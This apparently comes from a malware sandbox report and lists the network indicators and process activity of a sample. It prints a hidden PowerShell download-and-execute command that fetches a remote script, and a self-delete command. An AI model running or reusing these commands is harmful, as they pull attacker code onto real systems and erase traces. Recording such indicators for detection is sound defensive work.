Technical Information
- https://maxximbrasil.com/themes/config_20.ps1
- 'ma####brasil.com':443
- 'x1.#.lencr.org':80
- 'r3.#.lencr.org':80
- http://x1.#.lencr.org/
- http://r3.#.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRI2smg%2ByvTLU%2Fw3mjS9We3NfmzxAQUFC6zF7dYVsuuUAlA5h%2BvnYsUwsYCEgRNMQ1y9bS8oJmZ3tgDEXKPdA%3D%3D
- 'ma####brasil.com':443
- '34.##0.144.191':443
- '34.##9.100.209':443
- DNS ASK ma####brasil.com
- DNS ASK x1.#.lencr.org
- DNS ASK r3.#.lencr.org
- '<SYSTEM32>\cmd.exe' /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://maxximbrasil.com/themes/config_20.ps1')"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c ping 127.0.0.1 && del "<Full path to file>" >> NUL' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://maxximbrasil.com/themes/config_20.ps1')"
- '%WINDIR%\syswow64\cmd.exe' /c ping 127.0.0.1 && del "<Full path to file>" >> NUL
- '%WINDIR%\syswow64\ping.exe' 127.0.0.1